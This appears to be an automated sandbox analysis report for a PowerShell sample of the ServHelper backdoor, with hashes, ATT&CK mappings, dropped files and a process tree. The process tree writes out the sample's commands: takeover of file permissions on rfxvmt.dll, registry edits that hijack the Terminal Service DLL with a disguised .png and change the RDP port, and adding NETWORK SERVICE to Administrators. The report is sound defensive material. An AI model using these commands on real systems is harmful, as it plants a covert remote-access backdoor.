servhelper | b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5

Analysis

max time kernel
171s
max time network
184s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
08-02-2022 02:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5.ps1
Size

3.8MB
MD5

213d018805394eb6e12f57005f1d45e0
SHA1

b01887dc649cb1209abdad8ce9ea59ec33d1c6b2
SHA256

b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5
SHA512

c0334c5e90c3e5edd09c9ac7a7c5792bcdf43b4fd9362e5c573d6f0729d5c71db611967a9d5c417d430575a951e6270d7049879711db1a38598a2f16d486233c

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	Process
3408	icacls.exe
4460	icacls.exe
4428	icacls.exe
2756	icacls.exe
4012	takeown.exe
180	icacls.exe
4716	icacls.exe
3496	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000900000001e8cc-167.dat	upx

Loads dropped DLL 2 IoCs

Processes:

pid	Process
4888
4888

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
2756	icacls.exe
4012	takeown.exe
180	icacls.exe
4716	icacls.exe
3496	icacls.exe
3408	icacls.exe
4460	icacls.exe
4428	icacls.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 15 IoCs

Processes:

powershell.exesvchost.exeTiWorker.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
4448	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1504	powershell.exe
1504	powershell.exe
1780	powershell.exe
1780	powershell.exe
3128	powershell.exe
3128	powershell.exe
3836	powershell.exe
3836	powershell.exe
1504	powershell.exe
1504	powershell.exe
1504	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid	Process
668

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exesvchost.exeicacls.exeTiWorker.exe

description	pid	Process
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeShutdownPrivilege	3744	svchost.exe
Token: SeCreatePagefilePrivilege	3744	svchost.exe
Token: SeShutdownPrivilege	3744	svchost.exe
Token: SeCreatePagefilePrivilege	3744	svchost.exe
Token: SeShutdownPrivilege	3744	svchost.exe
Token: SeCreatePagefilePrivilege	3744	svchost.exe
Token: SeRestorePrivilege	4716	icacls.exe
Token: SeSecurityPrivilege	3128	TiWorker.exe
Token: SeRestorePrivilege	3128	TiWorker.exe
Token: SeBackupPrivilege	3128	TiWorker.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

powershell.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exe

description	pid	Process	procid_target
PID 1504 wrote to memory of 1780	1504	powershell.exe	85
PID 1504 wrote to memory of 1780	1504	powershell.exe	85
PID 1504 wrote to memory of 3128	1504	powershell.exe	89
PID 1504 wrote to memory of 3128	1504	powershell.exe	89
PID 1504 wrote to memory of 3836	1504	powershell.exe	91
PID 1504 wrote to memory of 3836	1504	powershell.exe	91
PID 1504 wrote to memory of 4012	1504	powershell.exe	107
PID 1504 wrote to memory of 4012	1504	powershell.exe	107
PID 1504 wrote to memory of 180	1504	powershell.exe	108
PID 1504 wrote to memory of 180	1504	powershell.exe	108
PID 1504 wrote to memory of 4716	1504	powershell.exe	109
PID 1504 wrote to memory of 4716	1504	powershell.exe	109
PID 1504 wrote to memory of 3496	1504	powershell.exe	110
PID 1504 wrote to memory of 3496	1504	powershell.exe	110
PID 1504 wrote to memory of 3408	1504	powershell.exe	111
PID 1504 wrote to memory of 3408	1504	powershell.exe	111
PID 1504 wrote to memory of 4460	1504	powershell.exe	112
PID 1504 wrote to memory of 4460	1504	powershell.exe	112
PID 1504 wrote to memory of 4428	1504	powershell.exe	113
PID 1504 wrote to memory of 4428	1504	powershell.exe	113
PID 1504 wrote to memory of 2756	1504	powershell.exe	114
PID 1504 wrote to memory of 2756	1504	powershell.exe	114
PID 1504 wrote to memory of 3168	1504	powershell.exe	115
PID 1504 wrote to memory of 3168	1504	powershell.exe	115
PID 1504 wrote to memory of 4448	1504	powershell.exe	116
PID 1504 wrote to memory of 4448	1504	powershell.exe	116
PID 1504 wrote to memory of 3620	1504	powershell.exe	117
PID 1504 wrote to memory of 3620	1504	powershell.exe	117
PID 1504 wrote to memory of 4616	1504	powershell.exe	119
PID 1504 wrote to memory of 4616	1504	powershell.exe	119
PID 4616 wrote to memory of 3664	4616	net.exe	120
PID 4616 wrote to memory of 3664	4616	net.exe	120
PID 1504 wrote to memory of 972	1504	powershell.exe	121
PID 1504 wrote to memory of 972	1504	powershell.exe	121
PID 972 wrote to memory of 1996	972	cmd.exe	122
PID 972 wrote to memory of 1996	972	cmd.exe	122
PID 1996 wrote to memory of 1184	1996	cmd.exe	123
PID 1996 wrote to memory of 1184	1996	cmd.exe	123
PID 1184 wrote to memory of 1216	1184	net.exe	124
PID 1184 wrote to memory of 1216	1184	net.exe	124
PID 1504 wrote to memory of 1728	1504	powershell.exe	125
PID 1504 wrote to memory of 1728	1504	powershell.exe	125
PID 1728 wrote to memory of 2720	1728	cmd.exe	126
PID 1728 wrote to memory of 2720	1728	cmd.exe	126
PID 2720 wrote to memory of 768	2720	cmd.exe	127
PID 2720 wrote to memory of 768	2720	cmd.exe	127
PID 768 wrote to memory of 3488	768	net.exe	128
PID 768 wrote to memory of 3488	768	net.exe	128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5.ps1
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Windows\system32\takeown.exe
  "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4012
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:180
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3496
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3408
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4460
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4428
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2756
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  2⤵
  PID:3168
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  2⤵
  - Modifies registry key
  PID:4448
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  2⤵
  PID:3620
- C:\Windows\system32\net.exe
  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:3664
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Windows\system32\cmd.exe
    cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\system32\net.exe
      net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1184
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        5⤵
        
        PID:1216
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\system32\cmd.exe
    cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\system32\net.exe
      net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        5⤵
        
        PID:3488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3128

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Branding\mediasrv.png

MD5
e2efb03e5ad345dc20f2619bc6c4aac1

SHA1
005f23c4d1846dd5b7a90d00286b33e3fc70ffa0

SHA256
278dc8c69a9fc030a7f5dbd932778c1e520c9d73fdef59426b518059ad0580b7

SHA512
111976af2680f0c5f650a9bc2221baf24d5b0abb55200b2feb85d7d416289ae147e4ddae9f08b09745af9cf0115619955f5d3d165757f4fbaaafcda9ebdecb30

Download Submit
C:\Windows\Branding\mediasvc.png

MD5
63d2e146cd2334d6c5f7dafab981ef04

SHA1
bf329e34b07390dabf3e7f8d8d62ac5e7136d4e9

SHA256
976550af2f2ec3e87f4fb9897975959b6af101abea6c7ca4768569eb614fb78d

SHA512
e1dde8623b0c7acc71aa5b8645fa543fa989375ebd863bfc091c42ed9523f4d8177cf1d77ba0c3b939ece661e667e8b434cfd9fa54e741311a65605b6e868400

Download Submit
C:\Windows\system32\rfxvmt.dll

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
memory/1504-136-0x0000027BF6570000-0x0000027BF677A000-memory.dmp

Filesize
2.0MB

Download
memory/1504-134-0x0000027BF3A76000-0x0000027BF3A78000-memory.dmp

Filesize
8KB

Download
memory/1504-135-0x0000027BF61E0000-0x0000027BF6356000-memory.dmp

Filesize
1.5MB

Download
memory/1504-133-0x0000027BF3A73000-0x0000027BF3A75000-memory.dmp

Filesize
8KB

Download
memory/1504-132-0x0000027BF3A70000-0x0000027BF3A72000-memory.dmp

Filesize
8KB

Download
memory/1504-130-0x0000027BDA040000-0x0000027BDA062000-memory.dmp

Filesize
136KB

Download
memory/1504-131-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/1780-137-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/1780-139-0x000002B7F6BA3000-0x000002B7F6BA5000-memory.dmp

Filesize
8KB

Download
memory/1780-138-0x000002B7F6BA0000-0x000002B7F6BA2000-memory.dmp

Filesize
8KB

Download
memory/1780-140-0x000002B7F6BA6000-0x000002B7F6BA8000-memory.dmp

Filesize
8KB

Download
memory/3128-142-0x000001D9245C0000-0x000001D9245C2000-memory.dmp

Filesize
8KB

Download
memory/3128-143-0x000001D9245C3000-0x000001D9245C5000-memory.dmp

Filesize
8KB

Download
memory/3128-144-0x000001D9245C6000-0x000001D9245C8000-memory.dmp

Filesize
8KB

Download
memory/3128-141-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/3744-149-0x000001BA2E160000-0x000001BA2E170000-memory.dmp

Filesize
64KB

Download
memory/3744-156-0x000001BA30EE0000-0x000001BA30EE4000-memory.dmp

Filesize
16KB

Download
memory/3836-145-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/3836-147-0x0000025573DB0000-0x0000025573DB2000-memory.dmp

Filesize
8KB

Download
memory/3836-146-0x0000025573DB6000-0x0000025573DB8000-memory.dmp

Filesize
8KB

Download
memory/3836-148-0x0000025573DB3000-0x0000025573DB5000-memory.dmp

Filesize
8KB

Download